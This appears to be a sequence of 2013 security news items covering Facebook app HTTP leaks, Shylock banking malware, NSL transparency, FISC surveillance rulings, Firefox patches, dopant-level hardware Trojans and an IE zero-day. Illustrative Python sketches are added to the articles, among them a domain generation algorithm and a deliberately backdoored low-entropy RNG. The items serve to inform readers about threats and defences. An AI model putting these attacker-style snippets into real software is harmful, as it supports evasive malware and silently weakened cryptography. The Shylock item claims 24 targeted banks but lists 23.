While not discussed in the update notes, iOS 7 also fixes a previously disclosed “USB charger” bug that surfaced in August that allowed hackers complete access to devices via a modded charger. Apple spokesman Tom Numayr confirmed last month that iOS 7 would give users the choice whether or not they want to trust the computer their device has been connected to.
Those interested in the full rundown of security fixes can head to the advisory Apple posted yesterday to its Mailing Lists site.
A researcher has discovered a privacy bug in the Facebook Android app that enables an attacker to view and download any images a user sends to Facebook. The problem derives from the fact that the app, along with the official Facebook Messenger app for Android, doesn’t always send those images over HTTPS, even though both apps are meant to do so.
The researcher, Mohamed Ramadan, reported the vulnerability to Facebook in February, and the company fixed the issue, Ramadan said. The bug affected the official Facebook and Facebook Messenger apps for Android, both of which are designed to send requests via a secure HTTPS connection. However, Ramadan found that in some cases the apps would send requests to the Facebook servers over plain HTTP. Specifically, he noticed that it happened when uploading photos.
What that means is that an attacker who is able to capture a target’s wireless traffic would be able to grab whatever images the target is uploading. The attacker could then do whatever he chooses with the photos.
“I found that the official Facebook Messenger and Facebook app for android latest version are sending and receiving images using HTTP protocol and any one on the same wireless network can sniff my traffic and view all images or even replace it with his own images,” Ramadan said in his report to Facebook.
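One common client-side defense against this class of bug is to refuse to send sensitive data over anything but HTTPS, so an accidental fallback to plain HTTP fails loudly instead of silently leaking images. A minimal sketch of such a guard (the function name and check are illustrative, not Facebook’s actual code):

```python
from urllib.parse import urlparse

def require_https(url: str) -> str:
    """Refuse any endpoint that would send data in the clear."""
    if urlparse(url).scheme != "https":
        raise ValueError("refusing insecure upload endpoint: " + url)
    return url

# An upload helper would call require_https() on the endpoint before
# transmitting photo bytes, turning a downgrade into a visible error.
```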
Facebook took a month or so to respond to the report, Ramadan said, but when they did, they said that the security team had been able to reproduce the bugs and was going to pay Ramadan $1,500 as part of its bug bounty program. A nice reward for a bit of security research. But then, a short while later, the Facebook security team got in touch again to say that it was adding $500 to the bounty because Ramadan had reported both the Messenger and regular app bugs.
The Android Facebook apps have been updated to fix this issue, and Ramadan said he recommends that users install the updates to avoid running into a problem with their private photos ending up in the wrong hands.
“It is time to update your Facebook apps right now, if you are a bit lazy like me and forget to update android apps then UPDATE NOW!” he said.
Image from Flickr photos of mkhmarketing.
Two dozen major U.S. and European banks are in the crosshairs of the Shylock, or Caphaw, financial malware, and victims who bank with one of the 24 financial institutions are at risk of giving up their credentials and losing the assets in their accounts.
Malware researchers have noticed a rise in infections of late, though the malware has been in circulation since 2011. While the initial infection point is unknown, the malware is adept at hiding its tracks: it uses a domain generation algorithm (DGA) to route phone-home traffic through a rotating set of IPs, with connections secured by self-signed SSL certificates.
“This limits the ability of traditional network monitoring solutions to dissect the packets on the wire for any malicious transactions,” said Zscaler researchers Sachin Deodhar and Chris Mannon in a blogpost today. Most of the infections, they said, are happening in the U.K., Italy, Denmark and Turkey.
DGA has been used previously by other malware families to hide from detection services and software. Domain generation algorithms periodically generate and test new domain names, checking whether a command-and-control server responds at each one. Static reputation services that maintain lists of C&C domains don’t fare well against DGA. On the attacker’s end, using DGA means there is no fixed command-and-control infrastructure for researchers and law enforcement to target for takedown.
Botnets and malware families such as PushDo, Zeus and TDL/TDSS also use DGA to attack financial customers, send spam or assist in targeted attacks against government, military and political organizations.
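The core idea behind a DGA can be shown in a few lines. The sketch below is purely illustrative – the seed, hash function, and TLD are hypothetical and are not Shylock’s actual scheme:

```python
import hashlib
from datetime import date

def generate_domains(day: date, count: int = 5) -> list[str]:
    """Derive a deterministic list of candidate C&C domains for a given day."""
    domains = []
    for i in range(count):
        seed = f"{day.isoformat()}-{i}".encode()
        label = hashlib.md5(seed).hexdigest()[:12]  # pseudo-random hostname
        domains.append(label + ".net")
    return domains

# The bot and the botmaster run the same algorithm, so the botmaster only
# needs to register one of the day's candidate domains ahead of time, while
# defenders would have to predict and block them all, every day.
```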
Shylock has been modified many times, adding features that help it slip past security detection software and services and frustrate researchers trying to analyze it. It has also added features such as webinjects to help it install malware on compromised machines on the fly, and plug-ins that help it spread over Skype instant messages.
“Administrators should view this transaction as a starting point for their investigation into any suspicious activity,” the researchers wrote. “It is not a malicious service, but illustrates how malware writers can leverage even legitimate services.”
Experts speculate that an exploit kit is serving up the latest Caphaw infections and exploiting vulnerabilities in Java to get onto a victim’s machine. It then drops an executable that varies for every infection, putting a damper on the ability to detect infections.
“The large number of potential rendezvous points with randomized names makes it extremely difficult for investigators and law enforcement agencies to identify and take down the CnC infrastructure,” the Zscaler researchers wrote. “Furthermore, by using encryption, it adds another layer of difficulty to the process of identifying and targeting the command and control assets.”
To date, Zscaler has found 64 Caphaw samples and 469 IP addresses making a call to a DGA location.
The malware does what it can to survive and persist on a machine; it can determine whether it’s being executed in a virtual machine and whether the host is online. If either fails, the malware will not execute. To maintain persistence, it creates an autorun registry entry and augments system processes to hinder its removal, the researchers said.
The researchers provided the list of 24 banks being targeted:
- Bank of Scotland
- Barclays Bank
- First Direct
- Santander Direkt Bank AG
- First Citizens Bank
- Bank of America
- Bank of the West
- Sovereign Bank
- Co-operative Bank
- Capital One Financial Corporation
- Chase Manhattan Corporation
- Citi Private Bank
- Comerica Bank
- E*Trade Financial
- Harris Bank
- Intesa Sanpaolo
- Regions Bank
- Bank of Ireland Group Treasury
- U.S. Bancorp
- Banco Mercantil, S.A.
- Varazdinska Banka
- Wintrust Financial Corporation
- Wells Fargo Bank
LinkedIn on Tuesday joined the fray of Internet companies requesting permission from the Foreign Intelligence Surveillance Court to publish data on the number of National Security Letters it receives.
Unlike Google, Microsoft and others that have petitioned the FISA court to lift its ban on the sharing of NSL data, LinkedIn does not offer Web-based email or storage service for its members and therefore does not store the same types of data on individuals that might interest the National Security Agency and the FBI. However, with the NSA’s stated ability and desire to map phone call metadata in order to connect and locate individuals who could be a threat to national security, LinkedIn’s similar mapping between its 238 million members’ professional careers could be of interest to the court.
In the meantime, the company not only filed an amicus brief with a California appeals court, but also fired off letters to the FISA court, the FBI, and its users explaining its desire for transparency, requesting a public hearing with the FISA court, and calling the ban on sharing NSL data unconstitutional.
Companies and individuals are barred by the FBI from confirming they’ve even received a National Security Letter, much less publicly revealing in aggregate how many requests have been made by the government. LinkedIn, similarly to Google and others in past motions, said the ban violates the company’s First Amendment rights to free speech and hinders their ability to maintain a trustworthy relationship with users with regard to government access to their data. Requests for additional transparency bubbled to the surface shortly after the Snowden documents were leaked exposing the depths of surveillance activity carried out by the NSA and the access the spy agency has to individuals’ data stored by Internet companies.
“This secretive environment and the information the government has shrouded also invites unfounded speculation that American Internet companies are part of the expansive government surveillance activities,” LinkedIn wrote in its amicus brief. “Such public misperception can have devastating effects on those companies’ reputations and can eviscerate the trust and transparency that they have worked so hard to develop with their users.”
The government, meanwhile, has proposed that companies be allowed to report NSL numbers in ranges of 0-1,000. LinkedIn fought back, stating that the approach would not work for smaller companies unlikely to receive thousands of NSL requests, because it would create the impression that the number of NSLs is more substantial than it really is. It offered the example of a company that receives 10 requests but would be able to report that number only within a range of 0-1,000.
“The information permitted under these measures would be misleading, would distort the public’s understanding of the actual number of government requests received, would reduce rather than increase transparency, and would deplete rather than enhance trust in the companies, the industry and the government,” LinkedIn wrote.
LinkedIn also called upon the FISA court to uphold a district court ruling that the ban on revealing NSL data is unconstitutional. In two cases, individuals in New York and Northern California were granted permission to publicly say they had been handed National Security Letters.
“When one individual receives a National Security Letter, they have a First Amendment right to speak about that fact under certain conditions,” said Brett Max Kaufman, a lawyer with the American Civil Liberties Union (ACLU). “At a global level, it’s very clear that LinkedIn has a parallel interest in being able to speak about an entire group of individuals whose information is affected by these requests.”
LinkedIn, meanwhile, published a transparency report yesterday, reporting that it fielded 83 government requests for member data in the first half of 2013, 70 of them from the United States, affecting 84 member accounts. LinkedIn reported that it provided data in 57 percent of those requests and 49 percent overall. Again, the number of NSL requests is not included in those totals.
“I believe these companies are absolutely sincere with these filings. LinkedIn has likely been involved in contentious negotiations with the government over the summer,” Kaufman said. “I think we can take their word for it that they are committed to their principles and feel strongly as a company that releasing this information would not damage national security.”
A newly declassified opinion from the Foreign Intelligence Surveillance Court from this summer shows the court’s interpretation of the controversial Section 215 of the USA PATRIOT Act that’s used to justify the National Security Agency’s bulk telephone metadata collections, and reveals that none of the companies that have been served with such orders has ever challenged one.
The opinion, which is one of just a handful of such documents to be made public in the last few months as the leaks of the NSA’s collection and cryptographic capabilities have continued to mount, lays out much of the court’s thinking and reasoning for continuing to grant the agency permission to gather telephone metadata on hundreds of millions of Americans. And what it shows is that the court’s ability to impose restrictions on the NSA’s collection and analysis methods is severely restricted by legal precedent.
The FISC opinion was written by Judge Claire V. Eagan and in it she explains that previous Supreme Court decisions have laid the legal groundwork that the NSA uses today to defend against accusations that its collection methods violate the Fourth Amendment protections against unreasonable search and seizure or that the collection violates a reasonable expectation of privacy regarding phone communications. In Smith v. Maryland, the Supreme Court ruled that people have no reasonable expectation of privacy with phone calls, because the phone company has equipment to record those calls and the numerical data related to them.
That reasoning is still used to underpin the NSA’s metadata collection, using the argument that if one person doesn’t have such protection under the Fourth Amendment, then neither does a large group of people.
“Put another way, where one individual does not have a Fourth Amendment interest, grouping together a large number of similarly situated individuals cannot result in a Fourth Amendment interest springing into existence ex nihilo,” the opinion says.
But perhaps the most interesting part of the opinion is the portion that explains the way that Section 215 is applied to the NSA’s metadata collection activities. In the opinion, Eagan contrasts Section 215 with a portion of the criminal code called the Stored Communications Act. That section includes some language that requires the government to provide “specific and articulable facts” to support its need for records or other information in a criminal investigation. That clause is not included in Section 215, and in fact only requires a statement of facts about the terrorism investigation in question.
“In enacting Section 215, Congress removed the requirement for ‘specific and articulable facts’ and that the records pertain to ‘a foreign power or an agent of a foreign power.’ Accordingly, now the government need not provide specific and articulable facts, demonstrate any connection to a particular suspect, nor show materiality when requesting business records under Section 215. To find otherwise would impose a higher burden–one that Congress knew how to include in Section 215, but chose to dispense with,” the opinion says.
In other words, Section 215 is written and interpreted in such a way so as to allow the NSA’s bulk metadata collection methods and to severely limit any challenges to it, so long as the agency is following the minimization and other guidelines set forth. Eagan’s opinion also makes it clear that the only legal challenges to this section can come from the companies on which the orders are served, and not from individuals whose records may be included. However, not one company has ever raised such an objection.
“To date, no holder of records who has received an Order to produce bulk telephone metadata has challenged the legality of such an Order. Indeed, no recipient of any Section 215 Order has ever challenged the legality of such an order, despite the explicit statutory mechanism for doing so,” Eagan’s opinion says.
Image from Flickr photos of Cameron Russell.
The Mozilla Foundation released Firefox 24 yesterday, issuing 17 security patches for the browser. Seven of the bulletins received the highest, critical impact rating, four are considered high impact advisories, the second most severe rating, and the remaining six are of moderate impact.
Mozilla’s update contained more total advisories, and more critically rated ones, than any release since January.
According to Mozilla’s security advisories, critical impact bugs are those that give attackers the ability to run code or install malicious software with no user interaction beyond typical browsing:
The first critical advisory, MFSA 2013-92, resolves a garbage collection hazard with default compartments and frame chain. The bug, which could be exploited to create a use-after-free condition, was uncovered by a security researcher operating under the handle Nils and a Mozilla developer named Bobby Holley.
MFSA 2013-90 covers a pair of memory corruption bugs, also reported by Nils. The first led to a use-after-free condition while scrolling through an image document, and the second had to do with nodes in a range request being added as children of two different parents.
Security researcher Aki Helin reported that combining lists, floats, and multiple columns could trigger an exploitable buffer overflow, which Mozilla fixed with MFSA 2013-89.
Using the address sanitizer tool, researcher Scott Bell discovered a use-after-free condition triggered by destroying a <select> element form. If MFSA 2013-81 goes unpatched, it could lead to a potentially exploitable crash.
Chrome security team member Abhishek Arya found a crashable use-after-free problem (MFSA 2013-79) in the Animation Manager, also using the address sanitizer tool.
MFSA 2013-78 patches an integer overflow bug, discovered by Alex Chapman, in the Almost Native Graphics Layer Engine (ANGLE) library that Mozilla uses. The vulnerability existed because “of insufficient bounds checking in the drawLineLoop function, which can be driven by web content to overflow allocated memory, leading to a potentially exploitable crash.”
The last critical impact bulletin, MFSA 2013-76, fixes a handful of memory safety hazards uncovered by Mozilla developers.
Moderate impact bugs are high or critical impact bugs that an attacker could only exploit under uncommon circumstances, such as when a user is running a non-default configuration. Mozilla’s fixes for these bugs are as follows: user-defined properties on DOM proxies get the wrong “this” object, WebGL information disclosure through OS X NVIDIA graphic drivers, uninitialized data in IonMonkey, same-origin bypass through symbolic links, NativeKey continues handling key messages after widget is destroyed, and improper state in HTML5 Tree Builder with templates.
Is it so outlandish anymore to consider that an attacker interested in military, political or corporate espionage would be able to infiltrate a supply chain and drop malware onto an integrated circuit? Evidence of hardware-based Trojans is anecdotal at best, and experts believe a change in motherboard circuitry or wiring, for example, would be detectable either via visual inspection or in comparison to a gold copy of the hardware in question.
However, given that documents leaked by NSA whistleblower Edward Snowden intimate the U.S. spy agency was working with chipmakers and placing backdoors into hardware bound for foreign targets, the once-outlandish doesn’t seem so outrageous anymore.
And now, an international team of researchers may have upped the ante on hardware-based attacks. In a recently published paper, they describe how they are able to modify a circuit with malware and yet, to detection mechanisms, the circuit appears to be pristine.
“Instead of adding additional circuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modified circuit appears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, including fine-grain optical inspection and checking against ‘golden chips,’” the team—Georg T. Becker, Francesco Regazzoni, Christof Paar and Wayne P. Burleson—wrote in its paper.
A dopant is a material added to a semiconductor to alter its electrical conductivity. The researchers tested their stealthy Trojan on Intel’s random number generator design used in Ivy Bridge processors, as well as on a side-channel resistant SBox implementation.
While there is relatively little research available on hardware Trojans, the team dove into its work understanding that a jump in outsourcing—circuits are often designed in one location, built offshore, and then packaged and distributed by yet more external parties—damages trust in the security of circuits.
“Even if chips are manufactured in a trusted [fabrication], there is the risk that chips with hardware Trojans could be introduced into the supply chain,” the researchers wrote. “The discovery of counterfeit chips in industrial and military products over the last years has made this threat much more conceivable.”
Some existing work on hardware Trojans, done mostly in academic settings, introduces malware at the hardware layer. This generally happens in a foundry setting where an attacker would have access only to layout masks; that limited access makes these types of attacks impractical, because the malicious circuit and its connections require additional space and would be easy to detect. Attacks using dopant have also been tried before, changing the concentration of dopant to age the circuit until it eventually fails. However, the researchers point out that approach is impractical because it’s impossible to predict when the circuit will fail and cause a denial-of-service condition.
The researchers said their approach is more realistic because it is done by modifying the polarity of the dopant, which can be done at a foundry setting, and still resist optical inspection and go undetected.
“A dedicated setup could eventually allow one to identify the dopant polarity. However, doing so in a large design comprising millions of transistors implemented with small technologies seems impractical and represents an interesting future research direction,” the paper said. “We exploit this limitation to make our Trojans resistant against optical reverse-engineering.”
“To the best of our knowledge, our dopant-based Trojans are the first proposed, implemented, tested, and evaluated layout-level hardware Trojans that can do more than act as denial-of-service Trojans based on aging effects.”
The paper explains in great detail how the researchers attacked the Intel Ivy Bridge processors and pulled off a side channel attack that leaked secret keys from the hardware.
Ivy Bridge generates unpredictable 128-bit random numbers to secure transactions. The researchers were able to insert their Trojan into the processor at the sub-transistor level and compromise the security of the keys generated with its random number generator.
“Our Trojan is capable of reducing the security of the produced random number from 128 bits to n bits, where n can be chosen,” the researchers wrote. “Despite these changes, the modified Trojan RNG passes not only the Built-In-Self-Test (BIST) but also generates random numbers that pass the NIST test suite for random numbers.”
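Conceptually, an RNG can emit output that passes statistical tests while containing far less entropy than advertised. The software analogy below is a hypothetical illustration of that principle only – the real Trojan works at the dopant level in silicon, and the names and parameters here are invented:

```python
import hashlib
import secrets

N_BITS = 32                    # effective entropy the attacker allows (n)
FIXED_KEY = b"attacker-known"  # constant an attacker has baked into the device

def trojan_rng() -> bytes:
    """Return 16 'random' bytes derived from only N_BITS bits of entropy."""
    entropy = secrets.randbits(N_BITS)  # the only unpredictable input
    # Hashing whitens the output, so it still looks statistically random,
    # but anyone who knows FIXED_KEY can brute-force all 2**N_BITS seeds.
    return hashlib.sha256(FIXED_KEY + entropy.to_bytes(4, "big")).digest()[:16]
```

This is why statistical test suites alone cannot certify an RNG: they measure how random the output looks, not how much secret entropy went into it.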
As for the side-channel Trojan, it demonstrates the flexibility of the dopant approach by attacking weaknesses that enable side-channel attacks in iMDPL, or improved Masked Dual-Rail Precharge Logic.
“Rather than modifying the logic behavior of a design, the dopant Trojan establishes a hidden side-channel attack that leaks secret keys,” the researchers wrote. “The dopant Trojan can be used to compromise the security of a meaningful real-world target while avoiding detection by functional testing as well as Trojan detection mechanisms.”
UPDATE–Microsoft is looking into reports of targeted attacks against a new vulnerability that exists in all supported versions of Internet Explorer. The attacks are targeting IE 8 and 9 and there’s no patch for the vulnerability right now, though Microsoft has developed a FixIt tool for it.
“The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website,” the Microsoft advisory says.
Microsoft did not specify where the attacks against this vulnerability were coming from or whether there are specific compromised Web sites involved. The company has several recommendations for mitigations for this vulnerability, including applying the FixIt solution and setting IE to warn you before running Active Scripting. The most likely attack scenarios for this vulnerability are the typical link in an email or drive-by download.
“In a web-based attack scenario, an attacker could host a website that contains a webpage that is used to exploit this vulnerability. In addition, compromised websites and websites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker’s website,” Microsoft said.
Researchers at Qualys say that the attacks are happening in Japan right now, but could spread quickly now that some details of the vulnerability are public.
“The exploit depends on a Microsoft Office DLL which has been compiled without Address Space Layout Randomization (ASLR) to locate the right memory segment to attack, but this DLL is extremely common and most likely will not lower the affected population by much. While the attack is very targeted and geographically limited to Japan, it might not affect you at the moment. But with the publication of the shim, other attackers can now analyze the condition fixed and will be able to produce an equivalent exploit fairly quickly,” Wolfgang Kandek of Qualys said.
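Whether a given DLL opts in to ASLR is recorded in its PE header: the `IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE` flag (0x0040) in the optional header's `DllCharacteristics` field. A minimal sketch of checking that flag, written against the documented PE layout (the function name `has_aslr` is our own):

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in flag

def has_aslr(data: bytes) -> bool:
    """Return True if a PE image opts in to ASLR (/DYNAMICBASE)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    # e_lfanew at offset 0x3C points to the PE signature.
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # DllCharacteristics sits at offset 70 in the optional header, which
    # follows the 4-byte signature and the 20-byte COFF file header.
    dll_chars = struct.unpack_from("<H", data, e_lfanew + 4 + 20 + 70)[0]
    return bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
```

A DLL loaded without this flag lands at a predictable base address, which is exactly what the exploit Kandek describes relies on to locate its target memory segment.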
This story was updated on Sept. 18 to add technical information on the exploit.